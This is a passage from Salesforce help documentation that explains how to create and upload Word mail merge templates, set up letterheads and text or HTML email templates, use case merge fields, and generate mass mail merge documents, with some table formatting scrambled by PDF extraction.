in the list. If it is not there, type https://*.salesforce.com in the text box and click Add. Click OK.
9. Go to the Advanced tab of the Internet Options dialog.
10. In the Security section at the bottom of the Settings box, confirm that “Do not save encrypted pages to disk” is blank and

does not have a check mark.
11. Click OK.
12. You may need to restart Internet Explorer for your changes to take effect.

If you use Internet Explorer 7 or 8, the first time you perform a mail merge, the popup message Exception: Automation
server can’t create object may occur. You can disregard this message. Click OK to close the popup and proceed
with your mail merge.

Note: Extended Mail Merge does not require the installation of an ActiveX control.

See Also:
Mail Merge Overview

Managing Templates
Available in: All Editions except Database.com

Your administrator can create and maintain templates for defining letterheads, sending outbound email, and generating mail
merge documents.

• Letterheads define the look and feel of your HTML email templates. Your HTML email templates can inherit the logo,
color, and text settings from a letterhead.

• Email templates allow you to send email to contacts, leads, and others using predefined templates.

• Mail merge templates allow you to create custom documents using the information from your records. For example, you
can create a customized thank you letter to a specific lead.

See Also:
Creating Letterheads
Managing Email Templates
Managing Mail Merge Templates
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Creating New Mail Merge Templates

Available in: All Editions except Database.com

User Permissions Needed

“Manage Public Templates”To upload mail merge templates:

“Manage Public Templates”To edit mail merge templates:

1. Open a new blank document in Microsoft® Word 2002, 2003, or 2007.
2. Use Word to compose the document so it contains the text, data, and formatting your users require.
3. Locate the text or data variables in your Word document that will change each time the template is used. For example, in

the salutation “Dear Bob,” “Bob” is a variable because it will change when the letter is sent to a different person.
4. Replace each variable with the appropriate Salesforce merge field.

Important:

Each mail merge field label you use must be unique.

• If you have Connect for Office, you can use Word integration to insert merge fields quickly.
• If you do not have Connect for Office:

a. Place your cursor where you want to insert a merge field.
b. In Word 2003 and earlier, select Insert and then Field from the Word menu bar. In Word 2007, select the Insert

tab on the Ribbon, click Quick Parts in the Text group, and then click Field.
c. Select Mail Merge in the Categories drop-down list.
d. Select MergeField in the Field names box.
e. In the Field Properties area of the Field name box, manually enter the valid merge field, such as

Opportunity_LineItem_ProductName.
f. Click OK.

Note:  To list information about all products associated with an opportunity, insert the
Opportunity_LineItem_Start merge field where you want to begin listing product information. Then,
insert all the merge fields you want to include for each product on an opportunity. Finally, insert the
Opportunity_LineItem_End to end the list.

5. Save your Word document.
6. Proceed to Uploading Mail Merge Templates to Salesforce on page 1280.

Tip:  For best results:

• Do not configure mail merge templates as “protected” or “restricted access” in Microsoft Word. Please refer to
Word's help for information about protected Word documents. (In Word, press F1 to open help.)
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• Do not connect mail merge templates to external data sources such as Excel worksheets or Access databases. Please
refer to Word's help for information about restoring mail merge documents to what Word calls “normal Word
documents.”

For details on how to set up your template with these tips in mind, refer to Guidelines for Uploading Mail Merge
Templates.

See Also:
Managing Mail Merge Templates
Mail Merge Overview

Modifying Existing Mail Merge Templates

Available in: All Editions except Database.com

User Permissions Needed

“Manage Public Templates”To upload mail merge templates:

“Manage Public Templates”To edit mail merge templates:

1. Download the sample mail merge templates and unzip the files to a convenient directory on your hard drive.
2. Review the instructions provided in salesforce_mailmerge_templates_howto.doc.
3. Open the desired sample template in Microsoft Word.
4. Save a copy of the sample template to your computer's desktop or other convenient location:

• Word 2000, XP, and 2003 users, select Save As from the File menu then choose an appropriate file name and destination
folder.

• Word 2007 users, select Save As from the Office button then choose an appropriate file name and destination folder.

5. Optionally, customize the text and formatting of the template.
6. Press ALT+F9 to display the hidden mail merge field codes.

Each of the mail merge fields should now appear in curly braces as follows: {MERGEFIELD Contact_FullName \*
MERGEFORMAT}

7. Change or add merge fields as necessary.

• If you have Connect for Office, you can use Word integration to insert merge fields quickly.
• If you do not have Connect for Office:

a. Place your cursor where you want to insert a merge field.
b. In Word 2003 and earlier, select Insert and then Field from the Word menu bar. In Word 2007, select the Insert

tab on the Ribbon, click Quick Parts in the Text group, and then click Field.
c. Select Mail Merge in the Categories drop-down list.
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d. Select MergeField in the Field names box.
e. In the Field Properties area of the Field name box, manually enter the valid merge field, such as

Opportunity_LineItem_ProductName.
f. Click OK.

Note:  To list information about all products associated with an opportunity, insert the
Opportunity_LineItem_Start merge field where you want to begin listing product information. Then,
insert all the merge fields you want to include for each product on an opportunity. Finally, insert the
Opportunity_LineItem_End to end the list.

8. Save your Word document.
9. Proceed to Uploading Mail Merge Templates to Salesforce on page 1280.

Tip:  For best results:

• Do not configure mail merge templates as “protected” or “restricted access” in Microsoft Word. Please refer to
Word's help for information about protected Word documents. (In Word, press F1 to open help.)

• Do not connect mail merge templates to external data sources such as Excel worksheets or Access databases. Please
refer to Word's help for information about restoring mail merge documents to what Word calls “normal Word
documents.”

For details on how to set up your template with these tips in mind, refer to Guidelines for Uploading Mail Merge
Templates.

See Also:
Managing Mail Merge Templates
Merge Fields for Mail Merge Templates
Mail Merge Overview

Creating Mail Merge Templates with Microsoft® Word

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

You can create mail merge templates to use with the mail merge utility. You’ll do this with the Connect for Office Word
add-in, which provides a complete list of valid merge fields for you to insert.

Important:

Each mail merge field label you use must be unique.

1. Open Microsoft® Word.
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2.

You’llIf you use

Select Log In from the salesforce.com drop-down menu on the toolbar.Word 2003 or
earlier

Open the salesforce.com tab on the Ribbon, click the Merge Fields drop-drown menu, and then
select Log In.

Word 2007

3. Enter your Salesforce username and password.
4. Click Login.

Note:  When you are successfully logged in and have an active session, the Log In command in the drop-down
button is disabled. To log out, click Log Out.

5. Create your mail merge template from an existing or blank Word document.
6. Place your cursor where you want to insert a Salesforce merge field. To replace an existing merge field, select the entire

merge field in your template. Mail merge fields must be unique.
7. In Word 2003 and earlier, select Insert Merge Field from the salesforce.com drop-down menu. In Word 2007, click the

Merge Fields drop-drown menu at the salesforce.com tab on the Ribbon, and then select Insert Merge Field.
8. In the Insert Merge Fields dialog, select a field type and then select the merge field you want to insert. If you use products

in Salesforce, see Including Opportunity Product Data in Mail Merge Templates on page 1279.
9. Click Insert to add the merge field at your current cursor position in your Word document.
10. Insert additional merge fields as desired to build your mail merge template.
11. After your mail merge template is complete, upload it to Salesforce from Setup by clicking Communication Templates

> Mail Merge Templates.

Including Opportunity Product Data in Mail Merge Templates

Products are available in Enterprise, Unlimited, and Developer Editions. They are also available in Professional Edition for
an additional fee. To add opportunity product data to your mail merge template, in the Insert Merge Fields dialog select
Opportunity Line Item Fields and then select the fields to insert. This inserts a table with the selected merge fields and special
“start” and “end” fields. (You can download sample default mail merge templates which include a table of opportunity product
data.) You can modify this table as needed, but the Opportunity_LineItem_Start merge field must be before all
opportunity product merge fields and the Opportunity_LineItem_End merge field must be after all opportunity product
merge fields. These start and end fields trigger Salesforce to list all of the products on the opportunity.

If you also want to insert product merge fields into the table of opportunity product merge fields, you can do so manually
without using the salesforce.com Word add-in:

1. In your Word document, place your cursor where you want to insert the merge field.
2. In Word 2003 and earlier, select Insert and then Field from the Word menu bar. In Word 2007, select the Insert tab on

the Ribbon, click Quick Parts in the Text group, and then click Field.
3. Select Mail Merge in the Categories drop-down list.
4. Select MergeField in the Field names box.
5. In the Field name box in the Field Properties area, enter the merge field name manually, such as

Opportunity_LineItem_ProductName.
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6. Click OK.

See Also:
Install Connect for Office

Connect for Office System Requirements

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

The system requirements for Connect for Office are:

• Microsoft® Office 2000, 2002, 2003, or 2007

• Microsoft® Windows® 2000, Windows XP, or Windows Vista® (32-bit only)

See Also:
Install Connect for Office

Uploading Mail Merge Templates to Salesforce

Available in: All Editions except Database.com

User Permissions Needed

“Manage Public Templates”To upload mail merge templates:

“Manage Public Templates”To edit mail merge templates:

Administrators and users with the “Manage Public Templates” permission must upload completed Microsoft Word mail
merge templates to Salesforce to make them available for use.

Tip:  Before uploading a template, we recommend reviewing Guidelines for Uploading Mail Merge Templates.

1. In Salesforce, from Setup, click Communication Templates > Mail Merge Templates.
2. Click New Template.
3. Enter a name and description for the template. This will help users correctly choose a template when generating mail

merge documents.

If your organization uses Extended Mail Merge, choose the appropriate document type: Document, Label, or Envelope.

4. Click Browse to select your Word mail merge template.
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5. Click Save to finish.

See Also:
Managing Mail Merge Templates
Merge Fields Overview
Mail Merge Overview

Using Letterheads
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Letterheads”To create or change letterheads:

A letterhead defines the logo, page color, and text settings for your HTML email templates. For best results, create a single
letterhead to use for all your HTML email templates. You can create letterheads and make them available organization-wide.

To use letterheads, from Setup, click Communication Templates > Letterheads.

From the Letterheads list page:

• To view a letterhead, select the name from the list.

• To edit a letterhead, click the name from the list and choose one of the edit options: Edit Properties or Edit Letterhead.

• To delete a letterhead, click Del next to the name. You cannot delete a letterhead that is used in any HTML email templates.

See Also:
Creating Letterheads
Letterhead Fields

Creating Letterheads

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Letterheads”To create or change letterheads:

Letterheads define the look and feel of your HTML email templates. Your HTML email templates can inherit the logo, color,
and text settings from a letterhead. A letterhead consists of properties and details. The properties are only visible inside your
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organization; they help users identify a letterhead. The details are applied to an email when using that letterhead. Use the
letterhead wizard to create both the properties and details of your letterhead.

1. From Setup, click Communication Templates > Letterheads.
2. Click New Letterhead.

Setting Letterhead Properties

1. Check Available For Use if you would like users to be able to use the new letterhead immediately.
2. Enter a Letterhead Label. The label is used to refer to the letterhead on user interface pages.
3. If necessary, change the Letterhead Unique Name. This is a unique name used to refer to the component when using

the Force.com API. In managed packages, this unique name prevents naming conflicts on package installations. This name
can contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with
a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores. With the Letterhead
Unique Name field, a developer can change certain components’ names in a managed package and the changes are reflected
in a subscriber’s organization.

4. Enter a description for this letterhead. The name and description fields are for internal use only to describe the letterhead
to other users.

5. Click Save. The letterhead detail page appears.

Setting Letterhead Details

1. Set the attributes for the letterhead.

• Click Edit Background Color, and enter a color for the background of your letterhead. Click the color picker button
to choose a color.

• Click Edit Header Properties, and select the color, alignment, and height for the top section of the letterhead.
• Click Select Logo to include an image of your company logo in the top or bottom section of the letterhead. To select

an image, choose a folder, and click the document name to attach the document. Alternatively, click Search in
Documents, and enter the file name to search for documents by name. Make sure the document you select is marked
as Externally Available on the Documents tab so that a user who does not have a Salesforce username and
password can view the image when it is received in an email.

• Click Remove Logo to delete the image from the letterhead.
• Click Edit Top Line, and enter a color and height for a horizontal line below the header. Click the color picker button

to choose a color.
• Click Edit Body Colors, and enter the background color for the main body of your letterhead.
• Click Edit Middle Line, and enter a color and height for the middle border in your letterhead. Click the color picker

button to choose a color.
• Click Edit Footer Properties, and select a color, alignment, and height for the bottom section of the letterhead.
• Click Edit Bottom Line, and select a color and height of a bottom horizontal line. Click the color picker button to

choose a color.

2. Optionally, click Preview to display the letterhead in a separate browser window.
3. Click Save.

To create an HTML email template that contains the settings in your letterhead, see Creating HTML Email Templates on
page 1613.

See Also:
Managing Email Templates
Creating Custom HTML Email Templates
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Letterhead Fields
Here is a description, in alphabetical order, of the fields that appear on the Letterhead Detail page.

DescriptionField

Check mark that indicates the letterhead can be applied to an
HTML template.

Available For Use

Name of the user who created the letterhead, including the
date and time.

Created By

Text that helps distinguish this letterhead from others.Description

Internal name to identify the letterhead.Letterhead Label

This is a unique name used to refer to the component when
using the Force.com API. In managed packages, this unique

Letterhead Unique Name

name prevents naming conflicts on package installations. This
name can contain only underscores and alphanumeric
characters, and must be unique in your organization. It must
begin with a letter, not include spaces, not end with an
underscore, and not contain two consecutive underscores.
With the Letterhead Unique Name field, a developer can
change certain components’ names in a managed package and
the changes are reflected in a subscriber’s organization.

Name of the user who last modified the letterhead, including
the date and time.

Modified By

The namespace prefix used by the email template within the
API.

Namespace Prefix

See Also:
Creating Letterheads
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Managing Email Templates
Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Edit HTML Templates”To create or change HTML email templates:

“Customize Application”To create or change Visualforce email templates:

“Manage Public Templates”To create or change public email template folders:

You can create four different types of email templates:

• Text - All users can create or change text email templates. See Creating Text Email Templates on page 1286.

• HTML with letterhead - Administrators and users with the “Edit HTML Templates” permission can create HTML
email templates based on a letterhead. See Creating HTML Email Templates on page 1613.

• Custom HTML - Administrators and users with the “Edit HTML Templates” permission can create custom HTML
email templates without using a letterhead. You must either know HTML or obtain the HTML code to insert in your
email template. See Creating Custom HTML Email Templates on page 1612.

• Visualforce - Administrators and developers can create templates using Visualforce. Visualforce email templates allow for
advanced merging with a recipient's data, where the content of a template can contain information from multiple records.
See Creating Visualforce Email Templates.

All of these email templates can include text, merge fields, and attached files. You can also include images on your HTML
and Visualforce templates. You can use email templates when you send an email from the Activity History related list of a
record. Text and HTML templates can also be used when you send mass email. A button to check the spelling of your template
is available for text templates and Visualforce templates without HTML tags.

Note: You can’t send a mass email using a Visualforce email template.

To access your email templates, do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.

• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to your
name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the left side
of the page, click Email > My Templates.

• Click on the name of any email template to go to the Viewing Email Templates page.

• To edit or delete a template, click Edit or Del next to the template name in the list.

• Click New Template to create any type of email template.
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Note:  Email templates used in the following features must be both public and active:

• Web-to-Lead

• Web-to-Case

• Email-to-Case or On-Demand Email-to-Case

• Assignment rules

• Escalation rules

• Auto-response rules

See Also:
Cloning Email Templates
Using Letterheads

Viewing Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Edit HTML Templates”To create or change HTML email templates:

“Customize Application”To create or change Visualforce email templates:

“Manage Public Templates”To create or change public email template folders:

To view a template, click the template name in the list. The options vary depending on the template type (custom, HTML,
Visualforce, or text):

• For text templates, click Edit to change the message content, subject, or merge fields.

• For custom and HTML templates:

◊ Click Edit HTML Version to change the content or merge fields of the HTML version.

Note:  All custom and HTML email templates include a text-only version for recipients who are unable to
view HTML emails. If you leave the text-only version blank, the text-only version is automatically generated
when you edit the HTML version.

◊ Click Edit Text Version to change the content or merge fields of the text-only version.

Warning: Salesforce.com recommends that you leave the text-only version blank. If you leave it blank,
Salesforce automatically creates the text-only content based on the current HTML version. If you don't leave
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the text-only version blank and instead manually enter content, subsequent edits to the HTML version aren't
reflected in the text-only version.

• For Visualforce templates:

◊ Click Edit Template to change the markup of the template page.

◊ The Visualforce Attachments related list indicates which attachments are being generated through Visualforce markup.

◊ If the Visualforce markup references components in installed managed packages, such as another class, a trigger, a
custom object, and so on, the Version Settings related list shows the package versions of the installed managed packages
containing the referenced components.

◊ If the email template includes encrypted data, keep in mind that the data displays encrypted within the generated email
and when viewing the Visualforce template page. It doesn't display in plain text for security purposes.

• Click Send Test and Verify Merge Fields to view a sample of the template populated with data from records you choose
and send a test email.

• Click Attach File from the Attachments related list to add an attachment to the template. The attached file is included
in every email that uses the template.

To select a file:

◊ Click the Search in Documents link to search for files in the Documents tab. If you select an image logo or other
graphic file, make sure the document is marked as Externally Available on the Documents tab so all email
recipients can view the image.

◊ Alternatively, choose an option from the File Location drop-down list to select a file from your computer or from a
document folder.

• If you have the “Manage Public Templates” permission, you can click [Change] next to the Author field to select a
different author. Initially, the author is the person who created the email template.

• Click Delete to remove the template.

• Click Clone to clone a template. For more information, see Cloning Email Templates on page 1290.

• If “Developer Mode” is enabled, click Show Dependencies to see what components the template references.

Creating Text Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Manage Public Templates”To create or change public email template folders:

To create a text email template:
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1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click New Template.
3. Choose the Text template type, and click Next.
4. Choose a folder in which to store the template.
5. Select the Available For Use checkbox if you would like this template offered to users when sending an email.
6. Enter an Email Template Name.
7. If necessary, change the Template Unique Name. This is a unique name used to refer to the component when using

the Force.com API. In managed packages, this unique name prevents naming conflicts on package installations. This name
can contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with
a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores. With the Template
Unique Name field, a developer can change certain components’ names in a managed package and the changes are reflected
in a subscriber’s organization.

8. Select an Encoding setting to determine the character set for the template.
9. Enter a Description for the template. Both template name and description are for internal use only.
10. Enter the Subject for the message.
11. Enter the text to appear in the message.
12. Optionally, enter merge fields in the template subject and text body. These fields will be replaced with information from

your records when you send an email.
13. Click Save.

Tip: Click Send Test and Verify Merge Fields to view a sample of the template populated with data from records
you choose and send a test email.

Attaching Files to Templates

To add an attachment to a template:

1. From Setup, click Email > My Templates. If you have permission to edit public templates, from Setup, click
Communication Templates > Email Templates.

2. Select a template.
3. Click Attach File from the email template detail page.
4. Choose a folder and click the document name to attach the document, or click Search in Documents and enter the file

name to search for a document by name.

Alternatively, click My Computer to attach a file from your computer.

The attached file is included in every email that uses the template. Note that attachments in mass emails are sent as links
rather than as physical files (see Sending Mass Email on page 1269).

See Also:
Managing Email Templates
Creating Visualforce Email Templates
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Using the Format Toolbar
Use the formatting toolbar to edit text in HTML. Select the text you wish to format and click the appropriate option described
below:

DescriptionOption

Choose a character style. Select the text you want applied to a font and then choose the appropriate
font.

Font

Choose a character size. Select the text you want applied to the size and then choose the size.Size

Insert a graphic from the documents library. This option is not available when doing some actions
such as creating custom home page components.

Choose a background color

Choose a font color

Make text bold

Make text italic

Underline text

Insert a new hyperlink or edit an existing link. Select the text you want to link, click this button,
and enter the URL for the link. To use a merge field such as {!Case_Link} as the destination of
the link, insert the merge field after the http://.

Left justify text

Center text

Right justify text

Bullet a list

Number a list

Increase text indent

Decrease text indent
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Creating Custom HTML Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Edit HTML Templates”To create or change custom HTML email templates:

“Manage Public Templates”To create or change public email template folders:

To create a custom HTML email template:

1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click New Template.
3. Choose Custom (without using Letterhead) and click Next.
4. Choose a folder in which to store the template.
5. Select the Available For Use checkbox if you would like this template offered to users when sending an email.
6. Enter an Email Template Name.
7. If necessary, change the Template Unique Name. This is a unique name used to refer to the component when using

the Force.com API. In managed packages, this unique name prevents naming conflicts on package installations. This name
can contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with
a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores. With the Template
Unique Name field, a developer can change certain components’ names in a managed package and the changes are reflected
in a subscriber’s organization.

8. Select an Encoding setting to determine the character set for the template.
9. Enter a Description of the template. Both template name and description are for your internal use only. The description

is used as the title of any email activities you log when sending mass email.
10. Click Next.
11. Enter the Subject to appear in the email you send.
12. Enter the HTML source text to appear in the message you send. This should include all the HTML tags.

Note:  If you are including an image, we recommend uploading it to the Documents tab so that you can reference
the copy of the image that is on our server. For example:

<img src="https://na2.salesforce.com/servlet/servlet.ImageServer?
id=015D0000000Dpwc&oid=00DD0000000FHaG&lastMod=1270576568000" alt="Company Logo"
height="64" width="64"/>

1289

Managing Email TemplatesUsing Salesforce-Integrated Email



13. Optionally, enter merge fields in the template subject and body. These fields will be replaced with information from your
lead, contact, account, opportunity, case, or solution when you send an email.

14. Click Next.
15. Optionally, enter the text-only version of your email or click Copy text from HTML version to automatically paste the

text from your HTML version without the HTML tags. The text-only version is available to recipients who are unable
to view HTML emails.

Warning: Salesforce.com recommends that you leave the text-only version blank. If you leave it blank, Salesforce
automatically creates the text-only content based on the current HTML version. If you don't leave the text-only
version blank and instead manually enter content, subsequent edits to the HTML version aren't reflected in the
text-only version.

16. Click Save.

Tip: Click Send Test and Verify Merge Fields to view a sample of the template populated with data from records
you choose and send a test email.

Note:  Users cannot modify the content of a custom HTML template when they select it for use in an email.

See Also:
Creating Visualforce Email Templates
Cloning Email Templates
Creating HTML Email Templates
Creating Visualforce Email Templates
Creating Letterheads
Adding Images to Email Templates

Cloning Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Edit HTML Templates”To create or change HTML email templates:

“Customize Application”To create or change Visualforce email templates:

“Manage Public Templates”To create or change public email template folders:

Cloning an email template involves saving an existing email template with a new name. To clone an email template:
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1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click the name of an email template in the list.
3. Click Clone.
4. Choose a folder in which to store the template.
5. Select the Available For Use checkbox if you would like this template offered to users when sending an email.
6. Enter an Email Template Name.
7. Enter a Description for the template. Both template name and description are for internal use only.
8. Click Save.

Adding Images to Email Templates

Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

HTML and Visualforce email templates not available in: Personal Edition

User Permissions Needed

“Edit HTML Templates”To create or change HTML email templates:

“Customize Application”To create or change Visualforce email templates:

“Manage Public Templates”To create or change public email template folders:

You can include images or logos on your HTML and Visualforce email templates. For HTML with letterhead templates,
logos or images come from the letterhead you choose when creating the template.

When creating custom HTML or Visualforce templates, simply include img tags that reference the image. We recommend
uploading the images to the Documents tab and referencing the copy of the image on the Salesforce server. For example, for
HTML:

<img src="https://na2.salesforce.com/servlet/servlet.ImageServer?
id=015D0000000Dpwc&oid=00DD0000000FHaG&lastMod=1270576568000" alt="Company Logo"
height="64" width="64"/>

Visualforce example:

<apex:image id="Logo" value="https://na7.salesforce.com/servlet/servlet.ImageServer?
id=015D0000000Dpwc&oid=00DD0000000FHaG&lastMod=127057656800"
height="64" width="64"/>
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Email Template Fields
An email template has the following fields, listed in alphabetical order.

DescriptionField

(Visualforce email templates only) Displays the version number
of the Force.com API the template was created under.

API Version

The person who created the template.Author

Indicates if users can use the template when sending emails.Available for Use

The name of the user who created the template.Created By

Description of the template. This text is used as the title of
any activities logged when sending mass email. The Activity

Description

History item displays as “Mass Email: {Template
Description}”.

This is a unique name used to refer to the component when
using the Force.com API. In managed packages, this unique

Template Unique Name

name prevents naming conflicts on package installations. This
name can contain only underscores and alphanumeric
characters, and must be unique in your organization. It must
begin with a letter, not include spaces, not end with an
underscore, and not contain two consecutive underscores.
With the Template Unique Name field, a developer can
change certain components’ names in a managed package and
the changes are reflected in a subscriber’s organization.

(HTML email templates only) Name of the column layout
sample that decides the text columns.

Email Layout

Indicates the character set for the email template.Encoding

The place where the template is stored.Folder

The most recent date that any user sent an email using the
template.

Last Used Date

(HTML email templates only) Name of the letterhead that
decides the logo, colors, and text settings. See Letterhead
Fields on page 1283 for more details.

Letterhead

The name of the user who last modified the template.Modified By

The namespace prefix used by the email template within the
API.

Namespace Prefix

Subject of the email. This text appears in the Subject field of
every email sent with this template. It is also used as the title

Subject

of an activity logged when sending a single email. The Activity
History item displays as “Email: {Template Subject}”. The
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DescriptionField

subject is not stored in Activity History items that you log
when sending mass email.

Name to identify the template.Email Template Name

Body of the email. This text appears in the body of every email
sent with this template. The maximum size is 384 KB.

Text Body

The total number of times that users have sent emails using
the selected template. This includes single and mass emails.

Times Used

Merge Fields for Cases

The available merge fields vary according to which Salesforce edition you have.

The list of available merge fields depends on the type of data that you’re working with. Most of the merge fields for cases
correspond directly with a case field. This table explains the more advanced merge fields that represent values derived from
processing a case record.

DescriptionMerge FieldField

Articles associated with the case converted to PDF attachments.

In the Emails related list on the case detail page, users can click
Send an Email and choose a template containing this merge field.

Case.Articles_as_PDFsArticles as
PDFs

The attachments can be previewed or deleted before the email is
sent.

A thread of all emails where the case contact is a sender or recipient
(To, CC, or BCC). The emails are listed in reverse chronological

Case.Email_ThreadEmail Thread

order so the most recent emails appear at the top of the thread.
The thread inserts the text version of the emails. You can’t use
this merge field in Visualforce pages.

The limits for the email thread are:

• Maximum number of emails: 200
• Email body truncation size: 32 KB

The description of the most recent comment to be created on a
case.

Case.Last_Case_CommentLast Case
Comment

Attachments for the case solution..Case.Solution_AttachmentsSolution
Attachments

The details of the solution associated with the case. If more than
one solution is associated with the case, the description of each
solution appears in a list..

Case.Solution_DescriptionSolution
Description
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DescriptionMerge FieldField

The title of the solution associated with the case. If more than
one solution is associated with the case, the title of each solution
appears in a list.

Case.Solution_SubjectSolution
Subject

The title and details of the solution associated with the case. If
more than one solution is associated with the case, the title and
description of each solution appears in a list.

Case.Solution_Subject_and_DescriptionSolution
Subject and
Description

Links to the subject and description of each suggested solution
that may help customers solve their issues.

Case.Suggested_SolutionsSuggested
Solutions

Note: Sending mass emails using templates with the
suggested solutions merge field could take several minutes
and is not recommended.

A unique identifier for the case email thread in Email-to-Case.
The thread ID is the unique ID of each case email, such as

Case.Thread_IdCase Thread
Id

[ref:_DV0Txx._500V0U9YB:ref]. By default, the thread ID is
added to both the subject and body of case emails. The default
location for the thread ID is at the end of the body. Use this merge
field to position it elsewhere in the body.

Notes on Merge Fields for Cases

Merge fields for entitlements on cases
Merge fields for entitlements on cases aren't supported. For example, if you add the Entitlement Name
{!Case.Entitlement} merge field to an email template, the field is not populated on the template.

Merge fields for Email-to-Case or On-Demand Email-to-Case
If you have enabled Email-to-Case or On-Demand Email-to-Case, you can create email templates that support agents
can use to respond to case emails. These templates can include merge fields that display information from the original
email in the response. See Managing Email Templates on page 1284.

Merge fields for Web-to-Case
To reference the name, email, phone, or company of the customer who submitted an online case with Web-to-Case,
use the relevant {!Case_OnlineCustomer...} field. To reference the contact or account associated with a case, use
the relevant contact or account merge fields.
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Generating Mass Mail Merge Documents with Extended
Mail Merge

Available in: All Editions except Database.com

User Permissions Needed

“Manage Public Documents”To generate mass mail merge documents:

Note:  You can generate mail merge documents using the Extended Mail Merge feature. Extended Mail Merge is
available by request only. Contact salesforce.com Customer Support if you are interested in this feature.

In addition, your administrator must activate the feature before you can use Extended Mail Merge.

With Extended Mail Merge, you can easily generate mail merge Microsoft® Word documents—such as form letters with
matching envelopes and address labels—for multiple records at the same time.

1. Click the accounts, contacts, or leads tab. Other kinds of records are not currently supported.
2. In the Tools area, click Mass Mail Merge to start the mass mail merge wizard.
3. Choose an appropriate list view from the View drop-down list.
4. Select the records to include in the mail merge. To select all records currently displayed on the page, select the checkbox

in the column header.
5. Click Next.
6. Select the types of Word documents you would like to generate. The supported document types are documents, envelopes,

and labels.
7. Select the Log an activity... checkbox to log the generation of these mail merge documents by adding a completed

task on each record.
8. Click Next.
9. Select the appropriate mail merge templates.

For documents, choose whether to create one Word document that includes all output or a separate Word document for
each record.

10. Optionally, click Preview Template to review a template's contents. Note that although the Word document that opens
may be editable, changes made in Word will not be applied to your current mail merge request. To make a newly revised
template available for mail merge, it must be uploaded first.

11. Click Finish.

Note:  If your request exceeds the maximum size limit for Extended Mail Merge, you are prompted to select either
fewer records or smaller templates.

Salesforce sends you an email when your generated documents are ready. When mail merge documents are:

• Under 3 MB, Salesforce sends them to your email as either Word document (.doc) or Zip file (.zip). attachments. If
the attachment size exceeds your organization’s maximum email attachment size, or your administrator has set all mail
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merge documents to be saved to the Documents tab, Salesforce automatically saves your generated documents to the
Documents tab. You’ll receive an email with a link to the document’s location.

• Over 3 MB, Salesforce saves them to your personal documents folder on the Documents tab.

Mail Merge Considerations
• Standard mail merge requires:

◊ Microsoft® Internet Explorer® versions 7, 8, 9, and 10 (We don’t support Google Chrome Frame™ plug-in for Internet
Explorer because the ActiveX controls required for mail merge are supported in Internet Explorer only.)

◊ Microsoft Word 2003 or 2007
◊ Microsoft Windows® XP and Windows Vista® (32-bit only)

Extended Mail Merge supports the following additional environments: the Mozilla Firefox Web browser and the Apple
Mac OS. Furthermore, it does not require the installation of an ActiveX control.

Standard mail merge and Extended Mail Merge support versions of Microsoft Word 2000 and above.

• Standard mail merge currently supports Word 2007 templates saved in .docx or .dotx file formats, but Extended Mail
Merge does not.

• Mail merge documents give you access only to the fields that are accessible to you via your page layout and field-level
security settings.

• Standard and extended mail merge don't support formatting from rich text area fields.
• Using mail merge from a record detail page automatically triggers standard workflow and validation rules for that record.

Using the mass mail merge wizard, however, doesn't trigger those rules.
• With Extended Mail Merge, a mail merge operation cannot exceed the following limits:

◊ 1,000 records
◊ The selected mail merge template(s) total size cannot be larger than 1 MB.
◊ For mass mail merges, the number of selected records multiplied by the combined sizes of the selected mail merge

templates cannot be larger than 50 MB.

See Also:
Mail Merge Overview
Sending Single Mail Merge Documents

Sending Single Mail Merge Documents
Available in: All Editions except Database.com

1. Click Mail Merge in the Activity History related list on the appropriate record. Accounts, contacts, leads, cases,
opportunities, and custom objects are supported.

Note:

With standard mail merge, the first time you create a mail merge document you must install an ActiveX control
that helps Salesforce communicate with Word. For more information, see Installing the Mail Merge ActiveX
Control on page 1274.
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2. Use the lookup to specify the record from which information will be merged.

If your organization uses person accounts, person accounts are returned in both account and contact lookup searches.

3. Select a mail merge template.
4. Optionally, select the checkbox to log a task for the mail merge.
5. Click Generate.

If the custom object has a master-detail relationship with opportunities, the primary contact for the opportunity is selected
by default.

6. Salesforce then generates your document:

• If your organization uses standard mail merge, Word opens with your generated document. When the document
displays, choose Save As from the File menu to save the document to your hard drive.

• If your organization uses Extended Mail Merge and your request exceeds the maximum size limit, you are prompted
